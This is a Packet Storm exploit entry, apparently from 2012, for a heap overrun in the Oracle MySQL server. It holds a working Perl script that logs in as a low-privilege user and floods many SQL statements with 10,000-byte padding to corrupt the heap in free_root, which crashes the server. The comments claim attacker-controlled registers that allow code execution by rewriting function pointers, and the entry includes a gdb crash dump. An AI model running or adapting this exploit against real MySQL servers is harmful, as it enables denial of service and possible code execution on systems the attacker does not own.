Oracle MySQL Heap Overrun

2012-12-03T00:00:00
ID PACKETSTORM:118551
Type packetstorm
Reporter Kingcope
Modified 2012-12-03T00:00:00

Description

                                        
                                            `# MySQL Heap Overrun  
# tested for the latest version of mysql server on a SuSE Linux system  
#  
# As seen below $edx and $edi are fully controlled,  
# the current instruction is  
# => 0x83a6b24 <free_root+180>: mov (%edx),%edi  
# this means we landed in a place where 4 bytes can be controlled by 4 bytes  
# with this function pointers and GOT entries can be rewritten to execute arbritrary code  
#  
# a user account (with less privileges) is needed  
# beware: this script will change the users password to an undefined value  
#  
  
=for comment  
Program received signal SIGSEGV, Segmentation fault.  
[Switching to Thread 0xa86b3b70 (LWP 9219)]  
free_root (root=0x8e7c714, MyFlags=1) at /root/mysql-5.5.19/mysys/my_alloc.c:369  
369 old=next; next= next->next;  
(gdb) bt  
#0 free_root (root=0x8e7c714, MyFlags=1) at /root/mysql-5.5.19/mysys/my_alloc.c:369  
#1 0x082a2e9f in cleanup (thd=0x8e7b9b8, all=true) at /root/mysql-5.5.19/sql/sql_class.h:1709  
#2 ha_rollback_trans (thd=0x8e7b9b8, all=true) at /root/mysql-5.5.19/sql/handler.cc:1401  
#3 0x0824a747 in trans_rollback (thd=0x8e7b9b8) at /root/mysql-5.5.19/sql/transaction.cc:260  
#4 0x081897a7 in THD::cleanup (this=0x8e7b9b8) at /root/mysql-5.5.19/sql/sql_class.cc:1271  
#5 0x08140fc3 in thd_cleanup (thd=0x8e7b9b8) at /root/mysql-5.5.19/sql/mysqld.cc:2026  
#6 unlink_thd (thd=0x8e7b9b8) at /root/mysql-5.5.19/sql/mysqld.cc:2075  
#7 0x08141088 in one_thread_per_connection_end (thd=0x8e7b9b8, put_in_cache=true) at /root/mysql-5.5.19/sql/mysqld.cc:2188  
#8 0x0823eab3 in do_handle_one_connection (thd_arg=0x8e7b9b8) at /root/mysql-5.5.19/sql/sql_connect.cc:796  
#9 0x0823ebbc in handle_one_connection (arg=0x8e7b9b8) at /root/mysql-5.5.19/sql/sql_connect.cc:708  
#10 0xb7744b05 in start_thread () from /lib/libpthread.so.0  
#11 0xb750fd5e in clone () from /lib/libc.so.6  
(gdb) i r  
eax 0x8ec63b8 149709752  
ecx 0xa86b326c -1469369748  
edx 0x5a5a5a5a 1515870810  
ebx 0x880eff4 142667764  
esp 0xa86b31b0 0xa86b31b0  
ebp 0xa86b31d8 0xa86b31d8  
esi 0x8e7c714 149407508  
edi 0x5a5a5a5a 1515870810  
eip 0x83a6b24 0x83a6b24 <free_root+180>  
eflags 0x210293 [ CF AF SF IF RF ID ]  
cs 0x73 115  
ss 0x7b 123  
ds 0x7b 123  
es 0x7b 123  
fs 0x0 0  
gs 0x33 51  
(gdb) x/10i $eip  
=> 0x83a6b24 <free_root+180>: mov (%edx),%edi  
0x83a6b26 <free_root+182>: je 0x83a6b33 <free_root+195>  
0x83a6b28 <free_root+184>: mov %edx,(%esp)  
0x83a6b2b <free_root+187>: call 0x83acb70 <my_free>  
0x83a6b30 <free_root+192>: mov 0x8(%esi),%eax  
0x83a6b33 <free_root+195>: test %edi,%edi  
0x83a6b35 <free_root+197>: jne 0x83a6b20 <free_root+176>  
0x83a6b37 <free_root+199>: test %eax,%eax  
0x83a6b39 <free_root+201>: movl $0x0,(%esi)  
0x83a6b3f <free_root+207>: movl $0x0,0x4(%esi)  
(gdb)  
=cut  
  
use Net::MySQL;  
use Encode;  
$|=1;  
  
my $mysql = Net::MySQL->new(  
hostname => '192.168.2.3',  
database => "test",  
user => "user",  
password => "test",  
debug => 0,  
port => 3306,  
);  
  
@commands = ('USE d', 'SHOW TABLES FROM d', "DESCRIBE t", "SHOW FIELDS FROM t", "SHOW COLUMNS FROM t", "SHOW INDEX FROM t",  
"CREATE TABLE table_name (c CHAR(1))", "DROP TABLE t", "ALTER TABLE t DROP c",  
"DELETE FROM t WHERE 1=1", "UPDATE t SET a=a","SET PASSWORD=PASSWORD('p')");  
  
foreach my $command (@commands) {  
for ($k=0;$k<length($command);$k++) {  
$c = substr($command, 0, $k) . "Z" x 10000 . substr($command, $k+1);  
$c2 = substr($command, 0, $k) . "AAAA..AA" . substr($command, $k+1);  
  
print "$c2";  
$mysql->query($c);  
}  
}  
$mysql->close;  
  
  
`